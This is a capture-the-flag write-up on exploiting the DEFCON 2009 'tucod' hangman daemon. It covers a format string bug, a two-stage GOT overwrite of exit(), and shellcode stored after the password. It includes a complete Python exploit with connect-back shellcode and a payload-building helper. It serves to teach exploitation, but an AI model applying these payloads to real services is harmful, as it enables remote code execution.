---------------------------------------------------
 DEFCON 2009 Capture The Flag finals challenge writeup - tucod
 by hkpco (Chanam Park)
===============================
 mail     - chanam.park@hkpco.kr
 homepage - http://hkpco.kr/
 date     - 2009. 08. 07
===============================
---------------------------------------------------

1. [Before]

Starting this year, kenshoto, who had run the CTF until now, stepped down and ddtek was chosen as the new organizer. As a result the overall way the contest was run, as well as the style and difficulty of individual challenges, changed to some degree.

This document describes the solution to the tucod binary, working from IDA's disassembly output. Detailed explanations of particular attack techniques, analysis of routine boilerplate, and the trial and error that went into the exploit are left out as far as possible; the focus is on the essential steps.

2. [Solution]

The file command gives a quick summary of the target binary.

---------------------------------------------------------------------------------------------------------------------------
$ file tucod
tucod: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), for FreeBSD 7.2, dynamically linked (uses shared libs), FreeBSD-style, stripped
---------------------------------------------------------------------------------------------------------------------------

It is a dynamically linked FreeBSD 7.2 binary with the debugging symbols stripped. The port the daemon listens on is easy to recover with a little analysis, so that step is omitted; let us connect to the server first.

--------------------
$ nc localhost 57005
Password: hkpco_test
--------------------

The daemon asks for a password and, as above, closes the connection when it does not match. The routine responsible is the following.
>>>
.text:08049C10    push    ebp
.text:08049C11    mov     ebp, esp
.text:08049C13    sub     esp, 28h
.text:08049C16    mov     [esp+28h+var_24], offset aPassword ; "Password: "
.text:08049C1E    mov     eax, [ebp+arg_0]
.text:08049C21    mov     [esp+28h+var_28], eax
.text:08049C24    call    sub_8048F60          // sends "Password: " over the socket
.text:08049C29    mov     [esp+28h+var_1C], 0Ah
.text:08049C31    mov     [esp+28h+var_20], 0FFh
.text:08049C39    mov     [esp+28h+var_24], offset byte_804B380
.text:08049C41    mov     eax, [ebp+arg_0]
.text:08049C44    mov     [esp+28h+var_28], eax
.text:08049C47    call    sub_8048E20          // reads up to 255 bytes from the socket into the buffer
.text:08049C4C    mov     [ebp+var_4], eax
.text:08049C4F    cmp     [ebp+var_4], 0
.text:08049C53    jg      short loc_8049C61
.text:08049C55    mov     [ebp+var_14], 0
.text:08049C5C    jmp     loc_8049CFC
.text:08049C61 ; ---------------------------------------------------------------------------
.text:08049C61
.text:08049C61 loc_8049C61:                            ; CODE XREF: sub_8049C10+43j
.text:08049C61    mov     eax, [ebp+var_4]
.text:08049C64    mov     ds:byte_804B380[eax], 0
.text:08049C6B    mov     [esp+28h+var_24], offset aHangemhigh ; "HANGEMHIGH!"
.text:08049C73    mov     [esp+28h+var_28], offset byte_804B380
.text:08049C7A    call    _strcmp              // compares the input against "HANGEMHIGH!"
<<<

The strcmp() comparison shows that the daemon's password is "HANGEMHIGH!". Below is the result of connecting with the recovered password.

---------------------------------------
$ nc localhost 57005
Password: HANGEMHIGH!
Welcome to Hangman Blondie!
What is your name? ChanAm
Nice to meet you ChanAm prepare to die!
 ---
 |  |
    |
    |
    |
    |
-----
|  |
used: ""
available: "abcdefghijklmnopqrstuvwxyz"
current: _________
Your guess: a
.
.
.
Your guess: z
 ---
 |  |
 O  |
/|\|
 |  |
/ \|
-----
|  |
Blondie, you missed, Tuco has hanged.
The correct word is: lengthily.
Play again (y/n)? n
---------------------------------------

The daemon reads four kinds of input: the password, the player name, a guessed letter, and the play-again answer. Of these, let us look at the routine that reads the name.
>>>
.text:080496D0    push    ebp
.text:080496D1    mov     ebp, esp
.text:080496D3    sub     esp, 38h
.text:080496D6    mov     [esp+38h+var_34], offset aWhatIsYourName ; "What is your name? "
.text:080496DE    mov     eax, [ebp+arg_0]
.text:080496E1    mov     [esp+38h+var_38], eax
.text:080496E4    call    sub_8048F60          // sends "What is your name? " over the socket
.text:080496E9    mov     [esp+38h+var_2C], 0Ah
.text:080496F1    mov     [esp+38h+var_30], 10h
.text:080496F9    lea     eax, [ebp+var_18]
.text:080496FC    mov     [esp+38h+var_34], eax
.text:08049700    mov     eax, [ebp+arg_0]
.text:08049703    mov     [esp+38h+var_38], eax
.text:08049706    call    sub_8048E20          // reads the data that the vulnerable function will later consume
.text:0804970B    mov     [ebp+var_4], eax
.text:0804970E    cmp     [ebp+var_4], 0
.text:08049712    jg      short loc_8049720
.text:08049714    mov     [esp+38h+var_38], 0
.text:0804971B    call    _exit
.text:08049720 ; ---------------------------------------------------------------------------
.text:08049720
.text:08049720 loc_8049720:                            ; CODE XREF: name_recv+42j
.text:08049720    mov     eax, [ebp+var_4]
.text:08049723    mov     [ebp+eax+var_18], 0
.text:08049728    mov     [esp+38h+var_34], offset aNiceToMeetYou ; "Nice to meet you "
.text:08049730    mov     eax, [ebp+arg_0]
.text:08049733    mov     [esp+38h+var_38], eax
.text:08049736    call    sub_8048F60
.text:0804973B    lea     eax, [ebp+var_18]
.text:0804973E    mov     [esp+38h+var_34], eax
.text:08049742    mov     eax, [ebp+arg_0]
.text:08049745    mov     [esp+38h+var_38], eax
.text:08049748    call    sub_8048F60          // vulnerability: the name buffer itself is passed as the format argument
.text:0804974D    mov     [esp+38h+var_34], offset aPrepareToDie ; " prepare to die!\n"
.text:08049755    mov     eax, [ebp+arg_0]
.text:08049758    mov     [esp+38h+var_38], eax
.text:0804975B    call    sub_8048F60
.text:08049760    leave
.text:08049761    retn
.text:08049761 name_recv endp
<<<

After reading the name, the routine calls sub_8048F60 with the name buffer in the second argument slot. That function is shown next; only the important part is reproduced.
>>>
.text:08048F60    push    ebp
.text:08048F61    mov     ebp, esp
.text:08048F63    sub     esp, 28h
.text:08048F66    mov     [ebp+var_4], 0
.text:08048F6D    mov     [ebp+var_8], 0
.text:08048F74    lea     eax, [ebp+arg_8]
.text:08048F77    mov     [ebp+var_C], eax
.text:08048F7A    mov     eax, [ebp+var_C]
.text:08048F7D    mov     [esp+28h+var_20], eax        // va_list: the variadic arguments starting at arg_8
.text:08048F81    mov     eax, [ebp+arg_4]
.text:08048F84    mov     [esp+28h+var_24], eax        // format string; at the vulnerable call site this is the buffer holding our input
.text:08048F88    lea     eax, [ebp+var_8]
.text:08048F8B    mov     [esp+28h+var_28], eax        // receives the buffer that is later handed to send()
.text:08048F8E    call    _vasprintf
.
.
.text:08048FA8    mov     eax, [ebp+var_8]
.text:08048FAB    mov     [esp+28h+var_20], 0
.text:08048FB3    mov     [esp+28h+var_24], eax
.text:08048FB7    mov     eax, [ebp+arg_0]
.text:08048FBA    mov     [esp+28h+var_28], eax
.text:08048FBD    call    sub_8048EA0                  // passes the buffer filled by vasprintf() on to this function (socket send)
.text:08048FC2    mov     [ebp+var_4], eax
<<<

This routine contains a format string bug (FSB). Reduced to pseudo-code it looks like this:

------------------------------------------------------------------------------------------------------
recv( sockfd, buffer_1, size );          // arbitrary data arrives over the socket
vasprintf( &buffer_2, buffer_1, args );  // buffer_1 is used directly as the format string, to glue the input onto the fixed text
send( sockfd, buffer_2, size );          // the formatted result goes back out over the socket
------------------------------------------------------------------------------------------------------

As the comments show, vasprintf() is the helper that combines the strings fixed in the binary with whatever the user typed before sending the result back. Because the caller hands the user's buffer over as the format argument instead of printing it through a fixed "%s" format, any conversions in the input such as %s, %x or %n are interpreted by vasprintf(), which is exactly a format string vulnerability.

The attack string can now be built around this bug, but there is one obstacle first, shown below.
>>>
.text:080496E9    mov     [esp+38h+var_2C], 0Ah
.text:080496F1    mov     [esp+38h+var_30], 10h        // 16-byte read
.text:080496F9    lea     eax, [ebp+var_18]
.text:080496FC    mov     [esp+38h+var_34], eax
.text:08049700    mov     eax, [ebp+arg_0]
.text:08049703    mov     [esp+38h+var_38], eax
.text:08049706    call    sub_8048E20                  // sub_8048E20 is a generic routine that reads a given number of bytes from the socket
<<<

This is the read that fills the buffer passed to the vulnerable function; it was already shown above. The problem is that the buffer holding the attack string is only 16 bytes. Fitting a format string attack into that size is not impossible in general, but whether it works depends heavily on the environment. Various tricks, including the $ direct-parameter syntax, were tried, but a small offset problem kept the attack from landing.

Looking at the program flow more broadly reveals a second weakness. It could be read off the disassembly, but it is simpler to observe the daemon's behaviour after one game has finished:

---------------------------
.
.
The correct word is: ripen.
Play again (y/n)? y
New Player (y/n)? y
What is your name?                  // the vulnerable function runs again
---------------------------

When the game is restarted the daemon asks whether to create a new player. Answering y runs the vulnerable function once more and reads a new name, which means the attack string can be spread over several rounds, 16 bytes per round, until it reaches the required size.

To get the vulnerable function to run again, i.e. to play another game, the current game has to be finished normally, and there is no need to analyse the game routine instruction by instruction for that. A little experimentation shows that every lowercase letter is accepted, and that after a certain number of guesses, whether the word is found or not, the game ends and the daemon asks whether to play again. So it is enough to feed the letters of the alphabet one by one until the play-again prompt appears.
Next we need a location whose overwrite redirects execution, a return address or similar. The following routine supplies one.

>>>
.text:08049BB2    mov     [esp+28h+var_24], offset aInvalidGuessGo ; "Invalid guess, goodbye.\n"
.text:08049BBA    mov     eax, [ebp+arg_0]
.text:08049BBD    mov     [esp+28h+var_28], eax
.text:08049BC0    call    sub_8048F60
.text:08049BC5    mov     [esp+28h+var_28], 0
.text:08049BCC    call    _exit
<<<

If the guess routine receives more than one character, or a character outside the alphabet, it terminates the daemon process serving the connected client through exit(), as above. The plan is therefore to overwrite the Global Offset Table (GOT) entry of exit() with the address where the shellcode is stored and then trigger this routine, so that the daemon runs our code instead of exiting. The GOT entry of exit() is obtained as follows.

---------------------------------------------
# objdump -R tucod

tucod:     file format elf32-i386-freebsd

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804b360 R_386_COPY        __mb_sb_limit
0804b364 R_386_COPY        _CurrentRuneLocale
0804b2ac R_386_JUMP_SLOT   setuid
0804b2b0 R_386_JUMP_SLOT   seteuid
...
0804b330 R_386_JUMP_SLOT   exit
...
---------------------------------------------

Space for the shellcode comes from the following routine.

>>>
.text:08049C16    mov     [esp+28h+var_24], offset aPassword ; "Password: "
.text:08049C1E    mov     eax, [ebp+arg_0]
.text:08049C21    mov     [esp+28h+var_28], eax
.text:08049C24    call    sub_8048F60          // sends "Password: " over the socket
.text:08049C29    mov     [esp+28h+var_1C], 0Ah
.text:08049C31    mov     [esp+28h+var_20], 0FFh
.text:08049C39    mov     [esp+28h+var_24], offset byte_804B380
.text:08049C41    mov     eax, [ebp+arg_0]
.text:08049C44    mov     [esp+28h+var_28], eax
.text:08049C47    call    sub_8048E20          // reads up to 0FFh (255) bytes into the buffer at 0804B380h
<<<

The password prompt at daemon start-up thus provides a comparatively roomy buffer, at a fixed address in the data segment, in which the shellcode can be parked. Because the same buffer is used for the password check, the data has to be laid out as follows.
--------------------------------
[Password][Null_Byte][Shellcode]
--------------------------------

The password is checked with strcmp(), and like most string functions it stops at the first null byte, so the comparison passes regardless of what follows. The shellcode therefore starts at the buffer address plus the length of the password plus the null byte: "HANGEMHIGH!" is 11 bytes, so the shellcode region begins at 0x0804b38c. The exploit below prefixes the shellcode with a 64-byte NOP sled and points exit()'s GOT entry at 0x0804b3a0, inside that sled, so the address does not have to be exact. The final payload sequence is:

=============================================================================================
1> [Password][Null_Byte][Shellcode]
2> FSB string 1: overwrite the upper 2 bytes of exit()'s GOT entry with the upper 2 bytes of the shellcode address
3> send the letters a-z until the play-again prompt appears
4> when the play-again prompt appears, send y
5> when asked whether to create a new player, send y
6> FSB string 2: overwrite the lower 2 bytes of exit()'s GOT entry with the lower 2 bytes of the shellcode address
7> send an invalid guess so that the game calls exit()
=============================================================================================

Below is the output of the exploit built from this sequence.

---------- TERMINAL 1 ---------------------------
$ python tuco_exp.py
Password:
Welcome to Hangman Blondie!
What is your name?
[+] alphabet(a)
[+] alphabet(b)
[+] alphabet(c)
[+] alphabet(d)
[+] alphabet(e)
[+] alphabet(f)
[+] alphabet(g)
[+] alphabet(h)
[+] alphabet(i)
New Player (y/n)?
What is your name?
Nice to meet you 0 ...
[+] exploit exit
---------------------------

---------- TERMINAL 2 -----------------------------------------
$ nc -l 7777
id
uid=1006(tuco) gid=1006(tuco) groups=1006(tuco)
-----------------------------------------------

The attack succeeds and the listener on port 7777 receives a shell running as the tuco user.

3. [Exploit]

The exploit is a plain Python script with no attempt at elegance. The sleeps scattered through the code are there because, when the remote server is slow, data sent in one go may not arrive as one piece. The telnetlib module would have made the code shorter, but the daemon does not communicate properly through it.
- tuco_exp.py -

# tucod exploit by hkpco
# (Python 3 port of the original Python 2 script; the sequence of sends is unchanged)
import socket
import sys
import time

target = '192.168.40.26'
port = 57005

# 1) Password stage: "HANGEMHIGH!" + NUL so strcmp() passes, followed by a 64-byte
#    NOP sled and the connect-back shellcode (listener: nc -l 7777).  Everything
#    lands in the 255-byte global buffer at 0x0804b380 and stays resident there.
pay_name = (b"HANGEMHIGH!" + b"\x00" + b"\x90" * 64 +
            b"\xb8\x67\x25\x8b\x3b\x2b\xc9\xb1\x11\xdb\xc8\xd9\x74\x24\xf4\x5f\x31\x47\x0e\x03\x47\x0e\x83\x88\xd9\x69"
            b"\xce\x3e\xe2\xc6\x19\xa4\x8a\xe9\x58\xc6\x2b\x9f\xba\xc7\x6b\xcf\x2e\x26\x06\xf2\xc4\x38\x66\x93\xd5\xb8"
            b"\xd1\x04\xb6\xd2\xbf\xfc\xfb\xa2\x10\x97\x59\xfa\x5d\xe7\xa1\xb5\xb5\x91\xab\x21\x69\x4d\x27\xd9\x1d\xbe"
            b"\xa5\x70\xb0\x49\xca\xd2\x18\x19\x5d\x62\x9b\x50\xdd" + b"\n")

# 2) Two 16-byte format strings, one per "What is your name?" prompt.  %hn stores
#    the number of bytes printed so far (4 address bytes + padding) as a 16-bit
#    value; "%7$" selects the stack slot holding the leading address.  Together
#    they turn exit()'s GOT entry into 0x0804b3a0, which is inside the NOP sled.
pay_a = b"\x32\xb3\x04\x08" + b"%2048c%7$hn" + b"\n"    # 4 + 2048  = 0x0804 -> upper half at 0x0804b332
pay_b = b"\x30\xb3\x04\x08" + b"%45980c%7$hn" + b"\n"   # 4 + 45980 = 0xb3a0 -> lower half at 0x0804b330
# 0x0804b330 R_386_JUMP_SLOT exit

words = "abcdefghijklmnopqrstuvwxyz"

sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((target, port))

print(sockfd.recv(10240))
sockfd.send(pay_name)   # 1: password + shellcode
print(sockfd.recv(10240))
sockfd.send(pay_a)      # 2: first half of the GOT overwrite
print(sockfd.recv(10240))

# 3) Play the game out: guess every letter until the daemon asks "Play again",
#    then ask for a new player to reach the name prompt a second time.
for ch in words:
    time.sleep(0.2)
    sockfd.send(ch.encode() + b'\n')
    data = sockfd.recv(10240)
    time.sleep(0.1)
    data2 = sockfd.recv(10240)
    if data.find(b'Play again') != -1 or data2.find(b'Play again') != -1:
        time.sleep(0.2)
        sockfd.send(b"y\n")
        time.sleep(0.2)
        data = sockfd.recv(1024)
        print(data)
        if data.find(b'New Player') != -1:
            time.sleep(0.2)
            sockfd.send(b'y\n')
            time.sleep(0.2)
            data = sockfd.recv(10240)
            print(data)
            sockfd.send(pay_b)          # second half of the GOT overwrite
            time.sleep(0.2)
            sockfd.send(b"hk\n")        # abnormal exit: an invalid guess makes the daemon call exit()
            time.sleep(0.2)
            print(sockfd.recv(10240))
            sys.exit(-1)
    print('alphabet(' + ch + ')')
print('loop end')
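The two-stage GOT overwrite and the [Password][Null_Byte][Shellcode] layout are the places where this exploit is easiest to get off by one. The helper below is an added example written for this page; it is not part of tuco_exp.py or of hkpco's work. It derives the two 16-byte format strings from the GOT slot and the target address the way pay_a and pay_b were derived, checks that each fits the 16-byte name prompt, simulates the two %hn stores on the GOT word, and checks that the chosen target falls inside the NOP sled of the password buffer. The addresses, the password and the 7$ parameter index are the page's own; the placeholder shellcode bytes and the helper names (half_write, split_got_overwrite, apply_stores, nop_sled_range) are assumptions made for the example.

```python
import re
import struct

PASSWORD_BUF = 0x0804B380   # global buffer filled by the "Password:" prompt
PASSWORD_BUF_LEN = 255      # bytes the prompt reads into it
EXIT_GOT = 0x0804B330       # 0804b330 R_386_JUMP_SLOT exit (objdump -R)
NAME_MAX = 16               # bytes read by the "What is your name?" prompt
ARG_INDEX = 7               # "%7$hn": the stack slot that holds the leading address
SHELLCODE = b"\xcc" * 91    # constructed placeholder, roughly the size of the real shellcode


def half_write(where, value16, prefix_len, arg_index):
    """One 16-bit %hn store laid out as [addr][%<pad>c][%<n>$hn].

    %hn stores the number of bytes printed so far, so the padding is
    value16 minus what was already emitted (the 4-byte address).  %c always
    prints at least one byte, so a zero-width pad is impossible; wrap to
    0x10000 instead, which the 16-bit store truncates back to the intended
    value.
    """
    pad = (value16 - prefix_len) & 0xFFFF
    if pad == 0:
        pad = 0x10000
    fmt = "%%%dc%%%d$hn" % (pad, arg_index)
    return struct.pack("<I", where) + fmt.encode() + b"\n"


def split_got_overwrite(got, target, arg_index=ARG_INDEX, max_len=NAME_MAX):
    """Two independent format strings, one per name prompt: the upper half of
    `target` into got+2, the lower half into got.  Raises if either one does
    not fit the prompt (the trailing newline is the read delimiter, not data)."""
    high = half_write(got + 2, (target >> 16) & 0xFFFF, 4, arg_index)
    low = half_write(got, target & 0xFFFF, 4, arg_index)
    for payload in (high, low):
        body = payload.rstrip(b"\n")
        if len(body) > max_len:
            raise ValueError("payload %r does not fit in %d bytes" % (body, max_len))
    return high, low


def predicted_store(payload, prefix_len=4):
    """What a half_write() payload makes %hn store: (address, 16-bit value)."""
    where = struct.unpack("<I", payload[:4])[0]
    m = re.fullmatch(r"%(\d+)c%(\d+)\$hn", payload[4:].rstrip(b"\n").decode())
    if m is None:
        raise ValueError("not a half_write() payload")
    printed = prefix_len + max(int(m.group(1)), 1)   # %c emits at least one byte
    return where, printed & 0xFFFF


def apply_stores(slot, original, stores):
    """Simulate the %hn stores on the 32-bit little-endian GOT word at `slot`."""
    mem = bytearray(struct.pack("<I", original))
    for where, value16 in stores:
        off = where - slot
        if not 0 <= off <= 2:
            raise ValueError("store at %#x misses the slot at %#x" % (where, slot))
        mem[off:off + 2] = struct.pack("<H", value16)
    return struct.unpack("<I", bytes(mem))[0]


def nop_sled_range(password, nop_len, shellcode, base=PASSWORD_BUF):
    """Addresses [start, end) of the NOP sled for [password][NUL][NOPs][shellcode]
    placed at `base`; raises if the layout overruns the 255-byte buffer."""
    total = len(password) + 1 + nop_len + len(shellcode)
    if total > PASSWORD_BUF_LEN:
        raise ValueError("layout needs %d bytes, buffer holds %d" % (total, PASSWORD_BUF_LEN))
    start = base + len(password) + 1
    return start, start + nop_len


def plan(target=0x0804B3A0):
    """Build the payloads for the page's addresses and verify them end to end."""
    sled_start, sled_end = nop_sled_range(b"HANGEMHIGH!", 64, SHELLCODE)
    if not sled_start <= target < sled_end:
        raise ValueError("target %#x is outside the NOP sled [%#x, %#x)" % (target, sled_start, sled_end))
    high, low = split_got_overwrite(EXIT_GOT, target)
    got_after = apply_stores(EXIT_GOT, 0xDEADBEEF,
                             [predicted_store(high), predicted_store(low)])
    return high, low, got_after


if __name__ == "__main__":
    high, low, got_after = plan()
    print("name #1:", high)
    print("name #2:", low)
    print("exit@GOT after both writes: %#010x" % got_after)
```

Two points the simulation makes visible. First, the two stores touch disjoint halves of the word, so their order does not matter; that is why they can live in separate name prompts. Second, between the two prompts the GOT entry is half overwritten, so nothing that calls exit() may run in the meantime; the letters a-z are all valid guesses, which is why the game can be played out safely before the deliberate invalid guess.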